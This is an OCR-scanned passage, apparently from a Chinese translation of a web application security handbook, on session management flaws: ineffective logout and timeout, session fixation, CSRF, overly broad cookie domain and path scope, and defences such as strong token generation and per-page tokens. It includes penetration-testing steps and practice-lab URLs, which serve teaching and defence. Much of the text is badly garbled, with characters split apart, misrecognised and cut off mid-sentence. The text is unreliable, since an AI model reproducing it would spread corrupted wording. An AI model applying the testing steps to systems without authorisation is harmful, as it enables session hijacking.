古人 否 被 应 用 程序 接受 ， 以 及 是 人 否 能 够 让 攻击 者 伪装 成 那 名 用 户 。 
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笑 试 访问 
http://mdsec.net/auth/382/ 
http://mdsec.net/auth/385/ 


7.3.4” 会 话 终止 易 受 攻击 


由 于 两 方面 的 原因 ， 正 确 终止 会 话 非 常 重要。 首先 ， 尺 可 能 绚 短 一 
个 会 话 的 寿命 可 降低 攻击 者 截获 、 猜 测 或 小 用 有 效 会 话 令 牌 的 可 能 性 。 
其 次 ， 如 采用 户 不 再 需要 现 有 会 话 ， 终 止 会 话 为 用 户 提供 一 种 使 其 失效 
的 途径 ， 在 进一步 降低 上 述 可 能 性 的 同时 ， 在 茶 种 程度 上 确保 共 胖 计算 
环境 中 会 话 的 安全 。 会 话 终止 功能 的 主要 缺陷 大 都 与 无 法 满足 这 两 个 天 
键 目 标 有 关 。 

一 些 应 用 程序 并 不 实施 有 效 的 会 话 终止 功能 。 会 话 一 旦 建立， 它 在 
收 到 最 后 请 求 后 的 许多 天 内 也 仍然 有 效 ， 直 到 服务 器 最 终 将 其 清除 。 即 
使 令 牌 存在 东 种 非常 难以 利用 的 缺陷 〈 例 如 ， 确 定 每 个 有 效 令 牌 需要 
100 000 次 猜测 ) ， 攻 击 者 仍然 能 够 截获 最 近 访 问 应 用 程序 的 每 一 名 用 
户 的 令 牌 。 

一 些 应 用 程序 并 不 提供 有 效 的 退出 功能 。 

口 有 些 时 候 ， 应 用 程序 根本 不 执行 退出 功能 。 用 户 没 有 办 法 要 求 应 
用 程序 终止 他 们 的 会 话 。 

口 有 些 时 候 ， 退 出 功能 实际 上 并 不 能 帮助 服务 器 终止 会 话 。 即 使 服 
务 器 从 用 户 的 浏览 堪 中 删除 令 牌 〈 例 如 ， 通 过 发 布 一 个 清空 令 牌 的 Set- 
Cookie 指 令 ) 。 然 而 ， 如 果 用 户 继续 提交 这 个 令 牌 ， 服 务 器 仍然 接受 


Be 

口 最 糟糕 的 情况 : 当 用 户 单 击 “ 退 出 ?按钮 时 ， 应 用 程序 并 不 与 服务 
器 通信 ， 因 此 服务 器 不 采取 任何 行动 。 相 反 ， 应 用 程序 执行 一 段 客 户 端 
脚本 清空 用 户 的 cookie， 在 随后 的 请 求 中 将 用 户 返 回 到 登录 页 面 。 访 问 
这 个 cookie 的 攻击 者 就 能 使 用 会 话 ， 好 像 用 户 从 未 退出 一 样 。 


























渗透 测试 步 又 


(1) 不 要 掉 入 检查 应 用 程序 对 客户 端 令 牌 执行 的 操作 (如 通 
过 一 个 新 的 Set-Cookie 指 令 、 客 户 端 脚本 或 者 终止 时 间 属 性 令 cookie 
失效 ) 的 陷阱 。 在 客户 端 浏览 器 内 对 令 牌 执行 的 任何 操作 并 不 能 终 
止 会 话 。 相 反 ， 调 查 服务 器 端 是 否 执行 会 话 终 止 操作 。 

(a) 登录 应 用 程序 获得 一 个 有 效 令 牌 。 

(b) 不 使 用 这 个 令 牌 ， 等 待 一 段 时 间 后 ， 使 用 这 个 令 牌 
提交 一 个 访问 受 保护 页 面 〈 如 “我 的 资料 "页 面 ) 的 请 求 。 








Cc) 如 宁 该 页 面 正 营 显 示 ， 表 示 令 牌 仍然 处 于 活动 状 


(d) 使 用 反复 试验 的 方法 确定 会 话 终 止 超时 时 间 ， 或 者 

一 个 令 牌 在 最 后 一 次 使 用 它 提 交 请 求 几 天 后 是 否 仍 被 使 用 。 可 

配置 Burp IntruderM 增 连续 请 求 之 间 的 时 间 间 隔 ， 自 动 完成 这 

项 任务 。 

(2) 确定 是 否 存 在 退出 功能 ， 用 户 是 否 能 够 使 用 这 一 功能 。 
如 果 不 能 ， 表 示 用 户 更 易于 受到 攻击 ， 因 为 他 们 没有 办 法 让 应 用 程 
序 终止 会 话 。 

(3) 如 果 应 用 程序 提供 退出 功能 ， 测 试 其 效 紊 。 退 出 后 ， 演 
试 重 新 使 用 原 有 的 令 牌 ， 确 定 其 是 否 仍然 有 效 。 如 果 令 牌 仍然 有 
效 ， 那 么 即使 用 户 已 经 * 退 出”， 也 依然 易于 受到 会 话 动 持 攻击 。 可 
以 使 用 Burp Suite 测 试 此 功能 的 效率 ， 有 具体 操作 如 下 : 从 代理 服务 
器 历史 记录 中 选择 一 个 依赖 会 话 的 最 近 请 求 ， 在 从 应 用 程序 中 注销 
后 将 其 发 送 给 Burp Repeater 重 新 发 布 该 请 求 。 


JON 











尝试 访问 


http://mdsec.net/auth/423/ 
http://mdsec.net/auth/439/ 
http://mdsec.net/auth/447/ 
http://mdsec.net/auth/452/ 
http://mdsec.net/auth/457/ 

















攻击 者 可 以 采用 各 种 方法 同 应 用 程序 的 其 他 用 户 发 动 攻 击 ， 试 图 截 
获 或 滥用 他 们 的 会 话 令 牌 。 

口 攻击 者 可 通过 跨 站 点 脚本 攻击 查询 用 户 的 cookie， 获 得 他 们 的 会 
o 然后 将 其 传送 至 自己 控制 的 任意 服务 器 。 第 12 间 将 详细 介绍 这 

P P 

口 攻 击 者 可 以 使 用 其 他 针对 用 户 的 攻击 ， 以 不 同 的 方式 劫持 用 户 的 
会 话 。 这 包括 实施 会 话 固定 攻击 ， 即 攻击 者 同一 名 用 户 发 送 一 个 已 知 的 
会 话 令 牌 ， 等 待 他 登录 ， 然 后 劫持 他 的 会 话 :， 以 及 跨 站 点 请 求 伪造 攻 
击 ， 其 中 攻击 者 从 他 控制 的 一 个 Web 站 点 向 应 用 程序 提出 一 个 专门 设计 
的 请 求 ， 由 于 用 户 的 浏览 器 会 随同 这 个 请 求 一 起 自动 提交 用 户 当前 的 
cookie, 攻击 者 因此 会 获得 用 户 的 cookie。 这 些 攻 击 也 请 参阅 第 12 章 的 
介绍 。 























渗透 测试 步 又 


(1) 确定 应 用 程序 中 存在 的 任何 跨 站 点 脚本 漏洞 ， 看 是 否 

en 
容 ) 。 

(2) 如果 应 用 程序 向 未 通过 验证 的 用 户 发 布 令 牌 ， 就 会 获得 
一 个 令 牌 并 进行 一 次 登录 。 如 宋 应 用 程序 在 攻击 者 登录 后 并 不 发 布 
一 个 新 令 牌 ， 就 表示 它 易 于 受到 会 话 固定 攻击 。 

C3) 即使 应 用 程序 并 不 同 未 通过 验证 的 用 户 发 布 会 话 令 牌 ， 
仍然 会 通过 登录 获得 一 个 令 牌 ， 然 后 返回 登录 页 面 。 如 果 应 用 程 
序 “ 愿 意 ” 返 回 这 个 页 面 ， 即 使 攻击 者 已 经 通过 验证 ， 那 么 也 可 以 使 
用 相同 的 令 牌 以 力 一 名 用 户 的 里 份 提交 为 一 次 登录 。 如 果 应 用 程序 
Te 


(4) 确定 应 用 程序 会 话 令 牌 的 格式 。 用 一 个 格式 有 效 的 伪造 
值 修改 令 脾 ， 然 后 尝试 使 用 它 登录 。 如 果 应 用 程序 允许 使 用 一 个 捏 
造 的 令 牌 建立 一 个 通过 验证 的 会 话 ， 表 示 它 易于 受到 会 话 固 定 攻 


(5) 如 果 应 用 程序 并 不 支持 登录 功能 ， 但 处 理 敏感 数据 (如 
个 人 信息 和 支付 细节 ) ， 并 在 提交 后 显示 这 些 信息 〈 如 在 “确认 订 
单 ”* 页 面 上 ) ， 那 么 使 用 前 面 的 三 种 测试 方法 尝试 访问 显示 敏感 数 
据 的 页 面 。 如 果 在 匿名 使 用 应 用 程序 期 间 生 成 的 令 牌 可 用 于 获取 用 
户 的 敏感 信息 ， 那 么 应 用 程序 就 易于 遭受 会 话 固定 攻击 。 

(6) 如 果 应 用 程序 完全 依靠 HTTP cookie 传 送 会 话 令 牌 ， 它 很 
可 能 容易 受到 跨 站 点 请 求 伪 造 (CSRF) 攻击 。 首 先 登 录 应 用 程 
序 。 然 后 ， 从 另 一 个 应 用 程序 的 页 面向 应 用 程序 提出 一 个 请 求 ， 解 
认 它 是 否 会 提交 用 户 的 令 牌 。 (必须 从 与 登录 目标 应 用 程序 相同 的 
浏览 器 进程 窗口 提交 令 牌 。) 设法 确定 所 有 参数 可 由 攻击 者 提前 决 
定 的 应 用 程序 敏感 功能 ， 利 用 这 种 缺陷 在 目标 用 户 的 权限 下 执行 未 
授权 操作 。 请 参阅 第 13 章 了 解 实 施 CSRF 攻 击 的 详情 。 









































cookie 的 工作 机 制 可 简单 概括 如 下 : ARS AE H HTTP VIR SE 
Set-cookie 发 布 一 个 cookie， 然 后 浏览 器 在 随后 的 请 求 中 使 用 Cookie 消 妃 
头 向 同一 台 服 务 器 重新 提交 这 个 cookie。 事 实 上 ， 事 情 远 比 这 复杂 。 

cookie 机 制 允 许 服 务 器 指定 将 每 个 cookie 重 新 提交 到 哪个 域 和 哪个 
URL 路 人 径 。 为 完成 这 一 任务 ， 它 在 Set-cookie 指 令 中 使 用 domain 和 path 属 


ME. 
1. cookie 域 限制 
位 于 foo.wahh-app.com 的 应 用 程序 建立 一 个 cookie 后 ， 浏 览 器 会 默认 
在 随后 的 所 有 请 求 中 将 cookie 重新 提交 到 foo.wahh-app.com 及 任何 子 域 
(40 admin.foo.wahh-app.com) 中 。 它 不 会 将 cookie 提 交 给 其 他 任何 域 ， 
包括 父 域 wahh-app. com 和 父 域 的 其 他 任何 子 域 ， 如 bar.wahh-app.com。 
服务 器 可 以 在 Set-cookie 指 令 中 插入 一 个 domain 属 性 ， 以 改变 这 种 
， 。 例 如 ， 假 设 位 于 foo.wahh-app.com 的 应 用 程序 返回 以 下 HTTP 
消息 闲 : 


Set-cookie: sessionId=19284710; domain=wahh-app.com; 


浏览 器 会 将 这 个 cookie 重 新 提交 给 wahh-app.com 的 所 有 子 域 ， 包 括 
bar.wahh-app.com. 





wa 
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=> 注解 ”服务 器 不 能 使 用 这 个 属性 随意 指定 域 。 背 先 ， 指 定 
的 域 要 么 必须 是 应 用 程序 在 其 上 运行 的 域 ， 要 么 是 它 的 父 域 (或 为 
直接 父 域 ， 或 有 一 定 间 隔 ) 。 其 次 ， 指 定 的 域 不 能 为 .com 或 .co.uk 
之 类 的 顶级 域 ， 因 为 这 样 做 会 允许 恶意 服务 器 在 其 他 任何 域 上 建立 
任意 cookie。 如 果 服 务 器 违反 以 上 任何 一 条 规定 ， 浏 览 器 将 完全 名 


上 略 Set-cookie 指 令 。 


如 果 应 用 程序 将 cookie 范 围 设 定 得 过 于 宽泛 ， 也 可 能 会 使 应 用 程序 
出 现 各 种 安全 漏洞 。 

以 一 个 允许 用 户 注 册 、 登 录 、 写 博客 文章 、 阅 读 他 人 博客 的 博客 应 
用 程序 为 例 。 它 的 主 应 用 程序 位 于 域 wahh-blogs.com 上 ， 当 用 户 登 录 这 
个 应 用 程序 时 ， 他 会 从 一 个 以 这 个 域 为 范围 的 cookie 中 收 到 会 话 令 牌 。 
每 名 用 户 都 可 以 创建 自己 的 博客 ， 通 过 以 用 户 名 为 前 级 的 一 个 新 的 子 域 
进行 访问 ， 例 如 : 











herman.wahh-blogs.com 
solero.wahh-blogs.com 


因为 cookie 被 自动 重新 提交 到 这 个 范围 内 的 每 一 个 子 域 ， 当 一 名 已 
经 登录 的 用 户 浏览 其 他 用 户 的 博客 时 ， 他 的 会 话 令 有 牌 将 与 其 请 求 一 起 提 
交 。 如 果 人 允许 博客 作者 在 他 们 自己 的 博客 中 插入 任意 JavaScript 脚 本 《〈 就 
像 现 在 的 许多 博客 应 用 程序 那样 ) ， 那 么 一 个 恶意 博客 作者 就 能 够 以 和 
保存 型 跨 站 点 脚本 攻击 一 样 的 方式 鳃 取 其 他 用 户 的 会 话 令 脾 (请 参阅 第 
12 章 了 解 相关 内 容 〉。 

之 所 以 会 出 现 这 样 的 问题 ， 是 因为 用 户 创作 的 博客 是 处 理 验证 和 会 
话 管理 的 主 应 用 程序 的 子 域 。HTTP cookie 并 没有 能 力 帮 助 应 用 程序 防 
止 主 域 发 布 的 cookie 被 重新 提交 给 它 的 子 域 。 

要 解决 这 个 问题 ， 主 应 用 程序 可 以 使 用 一 个 不 同 的 域名 (如 
www.wahh-blogs.com) ， 并 以 这 个 完全 合格 的 域名 为 它 的 会 话 令 牌 
cookie 的 域 范 围 。 这 样 ， 如 果 登 录用 户 浏览 其 他 用 户 的 博客 ， 会 话 
cookie 就 不 会 被 提交 。 

如 果 一 个 应 用 程序 明确 以 一 个 父 域 作为 它 的 cookie 域 范围 ， 就 会 出 
现 这 种 漏洞 的 男 一 个 版 本 。 例 如 ， 假 设 一 个 安全 性 至 关 重 要 的 应 用 程序 
位 于 域 sensitiveapp.wahh-organization.com 上 ， 当 它 建 并 cookie 时 ， 它 自 
由 设置 的 域 范围 如 下 ; 

这 样 做 造成 的 后 果 是 : 当 用 户 访问 wahh-organization.com 使 用 的 
子 域 时 ， 机 冤 应 用 程序 的 会 话 令 牌 cookie 都 将 被 提交 。 这 些 子 域 包 

















www.wahh-organization.com 


testapp.wahh-organization.com 


虽然 这 些 应 用 程序 可 能 全 都 属于 拥有 机 密 应 用 程序 的 同一 组 织 ， 但 
由 于 以 下 原因 ， 不 应 将 敏感 应 用 程序 的 cookie 提 交 给 其 他 应 用 程序 。 
口 负责 其 他 应 用 程序 的 人 员 与 负责 机 密 应 用 程序 的 人 员 的 信任 级 别 
: 同 


口 与 前 面 的 博客 应 用 程序 一 样 ， 其 他 应 用 程序 的 功能 可 能 会 将 提交 
给 应 用 程序 的 cookie 值 泄露 给 第 三 方 。 

口 其 他 应 用 程序 可 能 并 不 像 机 密 应 用 程序 那样 遵循 同样 严格 的 安全 
标准 ， 或 者 接受 全 面 的 安全 测试 (因为 它们 不 够 重要 、 并 不 人 处理 敏感 数 
据 ， 或 者 仅 为 测试 目的 而 建立 ) 。 应 用 程序 中 存在 的 许多 漏洞 (例如 跨 
站 点 脚本 漏洞 可 能 不 会 影响 它们 的 安全 状况 ， 但 外 部 攻击 者 却 可 以 利 

















用 一 个 不 安全 的 应 用 程序 截获 由 机 蜜 应 用 程序 创建 的 会 话 令 牌 。 
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=> 注解 ”通常 而 言 ， 基 于 域 的 cookie 隔 离 并 不 像 同 源 策 略 
(请 参阅 第 3 章 ) 那样 严格 。 除 了 在 处 理 主机 名 时 讨论 的 问题 外 ， 
浏览 器 还 会 在 确定 cookie 范 围 时 忽略 协议 和 端口 号。 如 果菜 个 应 用 
程序 与 另 一 个 不 可 信 的 应 用 程序 共享 主机 名 ， 并 依赖 协议 或 端口 号 
中 的 差异 来 隔离 自身 ， 那 么 ， 攻 击 者 通过 处 理 cookie 即 可 轻而易举 
地 破坏 这 种 隔离 。 该 应 用 程序 发 布 的 任何 cookie 都 可 被 与 它 共 享 主 
机 名 的 不 可 信 应 用 程序 访问 。 























渗透 测试 步 又 


审查 应 用 程序 发 布 的 所 有 cookie， 检 查 用 于 控制 cookie 范 围 的 
任何 domain 属 性 。 
(1) 如 果 应 用 程序 将 cookie 范 围 明 确 放 宽 到 父 域 ， 则 该 应 用 程 
序 可 能 易于 受到 通过 其 他 Web 应 用 程序 实施 的 攻击 。 
(2) 如 果 应 用 程序 将 它 的 cookie 范 围 设置 为 自己 的 域名 (或 者 
并 未 指定 domain 属 性 ) ， 则 通过 它 的 子 域 仍然 可 以 访问 其 中 的 应 用 
程序 或 功能 。 
确定 将 收 到 应 用 程序 发 布 的 cookie 的 所 有 可 能 的 域名 。 如 果 通 
过 这 些 域名 可 以 访问 任何 其 他 Web 应 用 程序 或 功能 ， 确 定 是 否 可 以 
利用 它们 获得 目标 应 用 程序 的 用 户 发 布 的 cookie。 


2.cookie 路 径 限 制 

位 于 /apps/secure/foo-app/index.jsp 的 应 用 程序 建立 一 个 cookie 后 ， 浏 
览 器 会 默认 在 随后 的 所 有 请 求 中 将 cookie 重 新 提交 到 路 
径 /apps/secure/foo-app/ 及 任何 子 目录 。 它 不 会 将 cookie 提 交 到 父 目 录 或 
服务 器 上 的 其 他 任何 目录 路 径 。 

与 cookie 范 围 域 限制 一 样 ， 服 务 器 可 以 在 Set-cookie 指 令 中 插入 一 个 
SA 改变 这 种 默认 行为 。 例 如 ， 如 果 应 用 程序 返回 以 下 HTTP 消 





Set-cookie: sessionId=187ab023e09c00a881a; path=/apps/; 


那么 浏览 器 会 将 这 个 cookie 重 新 返回 到 /apps/ 路 径 的 所 有 子 目 录 中 。 

相 比 于 基于 域 的 cookie 范 围 ， 这 种 基于 路 径 的 限制 比 同 源 策略 更 加 
严格 。 因 此 ， 如 果 将 其 作为 一 种 安全 机 制 ， 用 于 防范 同一 域 中 的 不 可 信 
应 用 程序 ， 则 这 种 防御 机 制 几 乎 完全 无 效 。 在 某 个 路 径 上 运行 的 客户 端 
代码 能 够 打开 指 同 同一 域 上 不 同 路 径 的 窗口 或 ifframe， 并 能 够 读 取 或 写 
入 该 窗口 ， 而 不 受 任何 限制 。 因 此 ， 获 取 范 围 为 同一 域 上 的 其 他 路 径 的 
cookie 实 际 上 并 不 困难 。 有 关 更 多 详情 ， 请 参阅 以 下 Amit Klein 撰写 的 论 
文 : 

















http://lists. webappsec.org/pipermail/websecunity_lists.webappsec.org/2006-March/000843. html 


74 保障 会 话 管理 的 安 





鉴于 会 话 管理 机 制 主要 受 两 类 漏洞 的 影响 ，Web 应 用 程序 必须 采取 
相应 的 防御 措施 ， 防 止 这 些 机 制 受 到 攻击 。 为 安全 地 执行 会 话 管理 ， 应 
用 程序 必须 以 可 菲 的 方式 生成 令 脾 并 且 必 须 在 令 牌 生成 到 废止 的 整个 
生命 周期 中 确保 它们 的 安全 。 


7.4.1 JS 


用 于 在 连续 请 求 中 重新 标识 用 户 喘 份 的 令 牌 ， 在 其 生成 过 程 中 ， 不 
应 给 攻击 者 提供 任何 机 会 ， 使 其 能 够 以 常规 方式 预测 或 推断 发 布 给 其 他 
用 户 的 令 牌 ， 从 而 从 应 用 程序 中 获得 大 量 的 令 牌 样本 。 

最 有 效 的 令 牌 生成 机 制 应 当 有 具备 以 下 两 点 : 

口 使 用 数量 极其 庞大 的 一 组 可 能 值 ; 

口 包含 强大 的 伪 随 机 源 ， 确 保 令 牌 以 无 法 预测 的 方式 平均 分 布 在 可 
能 值 范 围 内 。 

从 理论 上 讲 ， 只 要 拥有 足够 的 时 间 和 资源 ， 任 何 数据 ， 无 论 其 长 度 
和 复杂 程度 如 何 ， 都 可 以 使 用 亚 力 猜测 出 来 。 设 计 强 大 的 令 牌 生成 机 制 
的 目的 在 于 : 即使 蓄意 破坏 的 攻击 者 拥有 大 量 带 宽 和 处 理 资 源 ， 他 也 绝 
无 可 能 在 令 牌 的 有 效 期 限 内 ， 成 功 猜测 出 任何 一 个 有 效 的 令 牌 。 

除 服 务 占 用 来 定位 处 理 用 户 请 求 的 相关 会 话 对 象 的 一 个 标识 符 外 ， 
令 牌 中 不 应 包含 其 他 任何 内 容 。 无 论 是 公开 显示 还 是 隐藏 在 儿 层 编码 或 
模糊 处 理 中 ， 令 牌 都 不 应 含有 意义 或 采用 结构 。 所 有 关于 会 话 所 有 者 与 
状态 的 数据 都 应 保存 在 与 会 话 令 牌 对 应 的 服务 器 会 话 对 象 中 。 

应 谨慎 选择 随机 源 。 开 发 者 应 当 认 识 到 ， 各 种 可 用 的 随机 源 在 强度 
上 可 能 存在 巨大 的 差异 。 和 java.util.Random 一 样 ， 一 些 随机 源 非 常 适用 
于 各 种 需要 不 断 变 化 的 输入 源 的 情况 ， 但 只 需 根 据 唯一 一 个 输出 项 束 可 
以 准确 地 推断 出 它 的 前 后 随机 数 。 开 发 者 应 研究 不 同 的 可 用 随机 源 实际 
使 用 算法 的 数学 特性 ， 并 阅读 相关 文档 资料 ， 了 解 API 的 推荐 用 法 。 一 
sae isl a 加 密 安 全 性 ， 那 么 应 认为 它 
可 被 预测 。 
































— 
S 
注解 ”由 于 一 些 高 强度 的 随机 源 必 须 采 取 步 又 获得 足够 的 
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的 下 一 个 值 ， 因 此 可 能 无 法 为 一 些 大 容量 的 应 用 程序 迅速 建立 随机 
数 以 生成 令 牌 。 


除 选 择 最 为 稳定 可 靠 的 随机 源 外 ， 以 与 为 其 生成 令 牌 请 求 有 关 的 一 
些 信 息 作 为 烂 源 ， 也 是 一 种 恨 好 的 做 法 。 这 些 信息 可 能 并 不 是 那个 请 求 
独 有 的 ， 但 却 能 够 非常 有 效 地 消除 所 使 用 的 核心 伪 随 机 数 发 生 器 存在 的 
任何 缺陷 。 可 被 合并 的 信息 包括 : 

DO 来源 IP 地 址 (source IP address) 及 接收 请 求 的 端口 号 ; 

口 请 求 中 的 User-Agent 消 息 头 ; 

Oi Sy la) CRD) 。 

EE FES RE BCT ZS A FE EV PR SE EB, ERAAN E 
机 数 、 一 串 上 面 列 出 的 与 请 求 有 关 的 数据 以 及 一 个 仅 服 务 器 知道 并 在 每 
次 重启 时 重新 生成 的 机 密 字 符 串 。 然 后 ， 使 用 适当 的 散 列 算法 (例如 ， 
使 用 SHA-256 算 法 ) 对 这 个 字符 串 进行 处 理 ， 生 成 一 个 固定 长 度 、 便 于 
管理 的 字符 串 ， 并 以 它 作 为 令 牌 。( 将 最 容易 发 生变 化 的 数据 项 放 在 散 
列 输入 的 开始 部 分 有 助 于 最 大 化 散 列 算法 中 的 “雪崩 ”效应 所 。) 




















YV ”提示 ”决定 生成 会 话 令 牌 的 算法 后 ， 一 个 有 用 的 “思想 试 
验 ” 是 想象 伪 随 机 源 被 完全 攻破 ， 并 总 是 返回 相同 的 随机 数 。 如 果 











出 现 这 种 情况 ， 那 么 从 应 用 程序 中 获得 大 量 令 牌 样本 的 攻击 者 能 够 
截获 发 布 给 其 他 用 户 的 令 牌 吗 ? 使 用 上 面 描述 的 公式 ， 即 使 攻击 者 
完全 了 解 生 成 令 牌 所 使 用 的 算法 ， 一 般 也 绝 无 这 种 可 能 。 来 源 IP、 
端口 号 、User-Agent 消 息 头 和 请 求 时 间 共 同 生成 一 个 数目 庞大 的 

焙 。 即 使 掌握 所 有 这 些 信 息 ， 如 果 不 知 道 服务 器 使 用 的 机 密 字 符 

串 ， 攻 击 者 仍然 无 法 生成 对 应 的 令 牌 。 





建立 一 个 无 法 预测 值 的 安全 令 牌 后 ， 束 必须 在 这 个 令 牌 生成 到 废止 
的 整个 生命 周期 中 保障 它 的 安全 ， 确 保 不 会 将 其 泄露 给 除 令 牌 用 户 以 外 
的 其 他 任何 人 。 

口令 牌 只 能 通过 HTTPS 传 送 。 任 何以 明文 形式 传送 的 令 脾 者 应 视 为 


被 “污染 *”， 也 就 是 说 ， 不 能 确保 用 户 喘 份 不 被 泄露 。 如 果 使 用 HTTP 

cookie 传 送 令 牌 ， 应 将 这 些 cookie 标 记 为 安全 ， 以 防止 用 户 浏 览 右 通过 
HTTP 传 送 它们 。 如 果 可 能 ， 应 对 每 个 应 用 程序 页 面 使 用 HTTPS， 包 括 
静态 内 容 〈 如 帮助 页 面 、 图 像 等 ) 。 如 果 没 有 可 能 ， 并 且 仍 然 采用 

HTTP 服 务 ， 那 么 应 用 程序 应 将 任何 访问 敏感 内 容 〈 包 括 登 录 页 面 ) 的 
请 求 重 定 疝 到 HTTPS 服 务 。 帮 助 页 面 之 类 的 静态 资源 一 般 不 属于 敏感 内 
容 ， 不 需要 使 用 通过 验证 的 会 话 即 可 访问 ; 因此， 可 以 通过 使 用 cookie 
R 防止 在 访问 这 些 资 源 的 请 求 中 提交 令 








O 绝 不 能 在 UREL 中 传送 会 话 令 牌 ， 因 为 这 样 做 易于 受到 会 话 固定 攻 
击 ， 并 可 能 使 令 牌 出 现在 各 种 日 志 机 制 中 。 有 时 候 ， 开 发 者 在 禁 
cookie 的 浏览 器 中 使 用 这 种 技巧 执行 会 话 。 然 而 ， 最 好 是 对 所 有 导航 使 
用 POST 请 求实 现 这 一 目的 ， 并 将 令 牌 保存 在 HIML 表 单 隐藏 字段 中 。 
口 应 忆 是 执行 退出 功能 。 通 过 它 删除 服务 器 上 的 所 有 会 话 资源 并 终 
止 会 话 令 有 牌 。 

口 会 话 处 于 非 活 动 状 态 一 段 时 间 〈 如 10 分 钟 〉 后 ， 应 执行 会 话 终 
止 。 会 话 终 止 的 效果 应 和 用 户 完全 退出 的 作用 完全 相同 。 

口 应 防止 并 行 登录 。 每 次 一 名 用 户 登 录 ， 都 应 发 布 一 个 新 会 话 令 
牌 ， 同 时 废止 任何 属于 该 用 户 的 现 有 会 话 ， 就 好 像 他 已 经 退出 应 用 程序 
一 样 。 如 果 旧 令 牌 被 保存 一 段 时 间 ， 那 么 随后 收 到 任何 使 用 该 令 牌 提出 
的 请 求 ， 都 应 回 用 户 发 出 安全 警报 ， 告 诉 他 们 会 话 已 被 终止 ， 因 为 他 已 
经 从 其 他 位 置 登录 。 

口 如 果 应 用 程序 包含 任何 可 以 查看 会 话 令 牌 的 管理 或 诊断 功能 ， 应 
对 这 种 功能 加 以 严密 保护 ， 以 防止 未 授权 的 访问 。 许 多 时 候 ， 这 种 功能 
根本 没有 必要 显示 会 话 令 牌 ， 相 反 ， 它 应 提供 足够 的 与 会 话 所 有 者 有 关 
的 信息 ， 以 便于 执行 任何 支持 和 诊断 任务 。 这 样 做 整 不 会 泄露 该 用 户 提 
交 的 会 话 令 脾 ， 使 攻击 者 动 持 他 的 会 话 。 

口 应 尽 可 能 限定 应 用 程序 会 话 cookie 的 域 和 路 径 范 围 。 范 围 过 于 帘 
泛 的 cookie 通 常 是 由 配置 不 佳 的 Web 应 用 程序 平台 或 Web 服 务 器 生成 
的 ， 而 不 是 由 应 用 程序 开发 者 本 人 生成 的 。 通 过 应 用 程序 cookie 范 围 中 
的 域名 或 URL 路 人 径 ， 应 无 法 访问 其 他 Web 应 用 程序 或 不 可 信 的 功能 。 应 
特别 注意 用 于 访问 应 用 程序 域名 的 任何 现 有 子 域 。 有 时 ， 为 了 确保 不 会 
造成 这 种 漏 泣 ， 必须 修改 组 织 所 使 用 的 各 种 应 用 程序 的 域 和 路 径 命名 方 


”应 采取 特殊 措施 保护 会 话 管理 机 制 的 安全 ， 防 止 应 用 程序 用 户 成 为 
各 种 攻击 的 目标 。 
口 应 严格 审查 应 用 程序 的 代码 库 ， 以 确定 并 删除 任何 路 站 点 脚本 漏 
































洞 〈 请 参阅 第 12 章 了 解 相关 内 容 ) 。 许 多 这 类 漏洞 可 被 用 于 攻击 会 话 管 
理 机 制 ， 特 别 是 保存 型 (或 二 阶 ) XSS 攻 击 ， 它 可 对 每 一 种 会 话 滥用 与 
劫持 防御 造成 破坏 。 
DO 不 应 接受 用 户 提交 、 但 服务 器 并 不 认可 的 任意 令 牌 。 应 立即 在 浏 
览 器 中 取消 该 令 牌 ， 并 将 用 户 返 回 到 应 用 程序 的 起 始 页 面 。 
口 在 执行 转账 之 类 的 重要 操作 之 前 ， 要 求 进行 两 步 确 认 或 重新 验证 
可 有 效 防 御 跨 站 点 请 求 伪 造 和 其 他 会 话 攻击 。 
口 不 完全 依赖 HTTP cookie 传 送 会 话 令 牌 可 防御 路 站 点 请 求 伪 造 攻 
击 。 使 用 cookie 机 制 会 造成 这 种 漏洞 是 因为 ， 无 论 什 么 原因 提出 请 求 ， 
浏览 器 都 会 自动 提交 cookie。 如 果 总 是 通过 HTML 表 单 隐藏 字段 传送 令 
牌 ， 那 么 除非 攻击 者 已 经 知道 令 牌 ， 否 则 他 束 无 法 建立 一 个 表单 ， 再 通 
过 提交 该 表单 执行 未 授权 操作 ; 当然 ， 如 果 他 已 经 知道 令 牌 ， 就 可 以 轻 
易 实施 动 持 攻击 。 每 页 面 令 牌 也 有 助 于 防止 这 些 攻击 (请 参阅 下 一 节 了 
解 相 关内 容 〉。 

口 成 功 验证 后 应 总 是 建立 一 个 新 的 会 话 ， 以 避免 会 话 固定 攻击 的 影 
He 如 果 应 用 程序 并 不 使 用 验证 机 制 ， 但 允许 提交 敏感 数据 ， 那 么 会 话 
固定 攻击 造成 的 威胁 就 更 难以 解除 。 一 种 可 能 的 解决 办 法 是 使 提交 敏感 
数据 的 页 面 序列 尽 可 能 短 ， 并 且 在 这 个 序列 的 第 一 个 页 面 建立 一 个 新 的 
Ses 从 现 有 会 话 中 复制 任何 需要 的 数据 ， 如 购物 车 的 内 

， 或 者 使 用 每 页 面 令 牌 (参阅 下 一 节 ) 防止 知道 昌 第 一 个 页 面 所 使 用 

a 除非 完全 有 必要 ， 否 则 不 得 向 用 户 显 
示 个 人 数据 。 即使 有 必要 《如 显示 地 址 的 < 确认 订单 "页 面 ) ， 也 不 得 向 
用 户 显 示 信 用 卡号 码 和 密码 之 类 的 敏感 数据 ， 并 且 应 在 应 用 程序 的 响应 
中 隐藏 这 些 数据 。 

每 页 面 令 牌 

应 在 会 话 令 牌 的 基础 上 使 用 每 页 面 令 牌 ， 对 会 话 实施 更 加 严格 的 控 
制 ， 更 有 效 地 防御 或 阻 断 各 种 会 话 攻 击 。 使 用 每 页 面 令 牌 时 ， 每 次 用 户 
请 求 一 个 应 用 程序 页 面 〈 例 如 ， 不 是 图 像 ) ， 应 用 程序 都 会 建立 一 个 新 
的 页 面 令 牌 ， 并 通过 cookie 或 HTMIL 表 单 隐藏 字段 将 其 传送 给 客户 端 
用 户 每 次 提出 一 个 请 求 ， 除 通过 主 会 话 令 牌 进行 正常 确认 外 ， 页 面 令 牌 
还 根据 最 后 发 布 的 令 牌 值 进行 再 次 检验 。 如 果 出 现 不 匹配 的 情况 ， 整 个 
会 话 将 被 终止 。 因 特 网 上 的 许多 安全 性 至 关 重 要 的 应 用 程序 〈 如 电子 银 
行 ) ， 都 使 用 每 页 面 令 牌 来 强化 对 会 话 令 牌 机 制 的 保护 ， 如 图 7-12 所 
ZN o 
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虽然 使 用 每 页 面 令 牌 确实 给 导航 造成 一 些 限 制 “例如 ， 使 用 “后 
退 ” 和 ”前进 ” 按 钮 以 及 多 窗口 浏览 方面 ) ， 但 它 能 够 有 效 防御 会 话 固定 
